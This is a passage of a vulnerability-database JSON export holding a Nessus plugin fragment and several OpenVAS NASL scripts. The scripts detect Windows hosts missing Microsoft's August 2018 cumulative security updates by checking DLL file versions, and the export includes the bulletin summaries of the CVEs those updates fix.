the\n same user rights as the local user. (CVE-2018-8345)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A security feature bypass vulnerability exists when\n Active Directory Federation Services (AD FS) improperly\n handles multi-factor authentication requests.\n (CVE-2018-8340)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cortana allows arbitrary website browsing on\n the lockscreen. An attacker who successfully exploited\n the vulnerability could steal browser stored passwords\n or log on to websites as another user. (CVE-2018-8253)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8401, CVE-2018-8405,\n CVE-2018-8406)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)\");\n # https://support.microsoft.com/en-us/help/4343887/windows-10-update-kb4343887\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93e63484\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4343887 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343887');\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343887])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-08T13:28:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8343", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8341", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8340", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343898", "modified": "2019-12-20T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813846", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813846", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343898)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343898)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813846\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-8316\",\n \"CVE-2018-8339\", \"CVE-2018-8340\", \"CVE-2018-8341\", \"CVE-2018-8343\",\n \"CVE-2018-8344\", \"CVE-2018-8345\", \"CVE-2018-8348\", \"CVE-2018-8349\",\n \"CVE-2018-8351\", \"CVE-2018-8353\", \"CVE-2018-8355\", \"CVE-2018-8371\",\n \"CVE-2018-8372\", \"CVE-2018-8373\", \"CVE-2018-8385\", \"CVE-2018-8389\",\n \"CVE-2018-8394\", \"CVE-2018-8398\", \"CVE-2018-8403\", \"CVE-2018-8404\",\n \"CVE-2018-8405\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 13:48:12 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343898)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343898\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel vulnerability known as L1 Terminal\n Fault.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Windows kernel improperly handles objects in memory.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Active Directory Federation Services (AD FS) improperly handles multi-factor\n authentication requests.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Internet Explorer improperly validates hyperlinks before loading executable\n libraries.\n\n - Scripting engine handles objects in memory in Microsoft browsers.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - Microsoft browsers improperly access objects in memory.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - The DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in\n memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343898\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"mshtml.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"11.0.9600.19101\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\mshtml.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 11.0.9600.19101\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:05:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343885", "modified": "2020-06-04T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813844", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813844", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343885)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343885)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813844\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-0952\",\n \"CVE-2018-8200\", \"CVE-2018-8204\", \"CVE-2018-8266\", \"CVE-2018-8316\",\n \"CVE-2018-8339\", \"CVE-2018-8341\", \"CVE-2018-8343\", \"CVE-2018-8344\",\n \"CVE-2018-8345\", \"CVE-2018-8347\", \"CVE-2018-8348\", \"CVE-2018-8349\",\n \"CVE-2018-8350\", \"CVE-2018-8351\", \"CVE-2018-8353\", \"CVE-2018-8355\",\n \"CVE-2018-8357\", \"CVE-2018-8360\", \"CVE-2018-8370\", \"CVE-2018-8371\",\n \"CVE-2018-8372\", \"CVE-2018-8373\", \"CVE-2018-8381\", \"CVE-2018-8385\",\n \"CVE-2018-8388\", \"CVE-2018-8389\", \"CVE-2018-8390\", \"CVE-2018-8394\",\n \"CVE-2018-8398\", \"CVE-2018-8399\", \"CVE-2018-8401\", \"CVE-2018-8403\",\n \"CVE-2018-8404\", \"CVE-2018-8405\", \"CVE-2018-8406\", \"CVE-2018-8414\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 13:17:43 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343885)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343885\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel vulnerability known as L1 Terminal\n Fault.\n\n - Diagnostics Hub Standard Collector allows file creation in arbitrary locations.\n\n - Multiple security feature bypass vulnerability exists in Device Guard.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer improperly validates hyperlinks before loading executable\n libraries.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - Windows kernel and DirectX Graphics Kernel (DXGKRNL) driver improperly handles\n objects in memory.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - An improper processing for a .LNK file.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Microsoft browsers allowing sandbox escape.\n\n - Microsoft Edge improperly handles redirect requests and specific HTML content.\n\n - Microsoft .NET Framework improperly access information in multi-tenant environments.\n\n - WebAudio Library improperly handles audio requests.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows PDF Library improperly handles objects in memory.\n\n - Windows Shell does not properly validate file paths.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343885\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.1265\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.1265\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8377", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8400", "CVE-2018-8355", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8340", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343897", "modified": "2020-06-04T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813842", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813842", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343897)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343897)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813842\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-0952\",\n \"CVE-2018-8200\", \"CVE-2018-8204\", \"CVE-2018-8266\", \"CVE-2018-8350\",\n \"CVE-2018-8316\", \"CVE-2018-8339\", \"CVE-2018-8340\", \"CVE-2018-8341\",\n \"CVE-2018-8343\", \"CVE-2018-8344\", \"CVE-2018-8345\", \"CVE-2018-8347\",\n \"CVE-2018-8348\", \"CVE-2018-8349\", \"CVE-2018-8351\", \"CVE-2018-8353\",\n \"CVE-2018-8355\", \"CVE-2018-8357\", \"CVE-2018-8377\", \"CVE-2018-8360\",\n \"CVE-2018-8370\", \"CVE-2018-8371\", \"CVE-2018-8372\", \"CVE-2018-8373\",\n \"CVE-2018-8381\", \"CVE-2018-8385\", \"CVE-2018-8390\", \"CVE-2018-8389\",\n \"CVE-2018-8394\", \"CVE-2018-8398\", \"CVE-2018-8401\", \"CVE-2018-8403\",\n \"CVE-2018-8399\", \"CVE-2018-8400\", \"CVE-2018-8404\", \"CVE-2018-8405\",\n \"CVE-2018-8406\", \"CVE-2018-8414\", \"CVE-2018-8388\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 12:31:47 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343897)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343897\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel vulnerability known as L1 Terminal\n Fault.\n\n - Diagnostics Hub Standard Collector allows file creation in arbitrary locations.\n\n - Multiple security feature bypass vulnerability exists in Device Guard.\n\n - Microsoft Windows PDF Library improperly handles objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer improperly validates hyperlinks before loading executable\n libraries.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - Active Directory Federation Services (AD FS) improperly handles multi-factor\n authentication requests.\n\n - Windows kernel, DirectX Graphics Kernel (DXGKRNL) driver and Win32k component\n improperly handles objects in memory.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - An improper processing for a .LNK file.\n\n - Windows kernel fails to properly handle parsing of certain symbolic links.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Microsoft browsers allowing sandbox escape.\n\n - Microsoft Edge improperly handles redirect requests and specific HTML content.\n\n - Microsoft .NET Framework improperly access information in multi-tenant environments.\n\n - WebAudio Library improperly handles audio requests.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Microsoft Edge improperly accesses objects in memory.\n\n - Windows Shell does not properly validate file paths.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343897\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.610\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.610\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8342", "CVE-2018-8343", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8397", "CVE-2018-8316", "CVE-2018-8396", "CVE-2018-8373", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8346", "CVE-2018-8341", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343900", "modified": "2020-06-04T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813845", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813845", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343900)", "sourceData": "###############################################################################\n# OpenVAS 